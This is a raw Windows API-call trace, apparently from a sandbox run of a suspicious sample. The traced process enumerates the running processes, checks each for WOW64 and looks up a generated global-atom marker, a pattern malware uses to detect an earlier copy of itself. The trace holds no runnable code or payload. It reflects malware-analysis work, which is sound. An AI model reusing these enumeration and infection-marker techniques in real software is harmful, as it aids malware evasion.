	[0122.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.337] CloseHandle (hObject=0x698) returned 1
	[0122.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9938, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.337] CloseHandle (hObject=0x698) returned 1
	[0122.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9a28, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.338] CloseHandle (hObject=0x698) returned 1
	[0122.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.338] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetLastError () returned 0x5
	[0122.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.340] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.340] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.340] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.341] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.343] GetLastError () returned 0x5
	[0122.344] GetLastError () returned 0x5
	[0122.344] GetLastError () returned 0x5
	[0122.344] GetLastError () returned 0x5
	[0122.344] GetLastError () returned 0x5
	[0122.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.344] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.344] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.344] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.344] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.345] CloseHandle (hObject=0x698) returned 1
	[0122.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.345] CloseHandle (hObject=0x698) returned 1
	[0122.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.345] CloseHandle (hObject=0x698) returned 1
	[0122.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.346] CloseHandle (hObject=0x698) returned 1
	[0122.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.346] CloseHandle (hObject=0x698) returned 1
	[0122.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.380] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5a18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d568, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.386] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.386] CloseHandle (hObject=0x698) returned 1
	[0122.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.386] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.386] CloseHandle (hObject=0x698) returned 1
	[0122.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.387] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.387] CloseHandle (hObject=0x698) returned 1
	[0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.387] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.387] CloseHandle (hObject=0x698) returned 1
	[0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.387] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.388] CloseHandle (hObject=0x698) returned 1
	[0122.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.388] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.388] CloseHandle (hObject=0x698) returned 1
	[0122.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.388] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.388] CloseHandle (hObject=0x698) returned 1
	[0122.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.389] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.389] CloseHandle (hObject=0x698) returned 1
	[0122.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.389] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.389] CloseHandle (hObject=0x698) returned 1
	[0122.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.389] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.390] CloseHandle (hObject=0x698) returned 1
	[0122.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.393] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.393] CloseHandle (hObject=0x698) returned 1
	[0122.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.393] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.393] CloseHandle (hObject=0x698) returned 1
	[0122.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.394] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.394] CloseHandle (hObject=0x698) returned 1
	[0122.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d6b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.394] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.394] CloseHandle (hObject=0x698) returned 1
	[0122.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.394] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.394] CloseHandle (hObject=0x698) returned 1
	[0122.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b96e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.395] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.395] CloseHandle (hObject=0x698) returned 1
	[0122.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.395] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.395] CloseHandle (hObject=0x698) returned 1
	[0122.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.395] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.395] CloseHandle (hObject=0x698) returned 1
	[0122.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.396] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.396] CloseHandle (hObject=0x698) returned 1
	[0122.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.396] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.396] CloseHandle (hObject=0x698) returned 1
	[0122.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.396] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.396] CloseHandle (hObject=0x698) returned 1
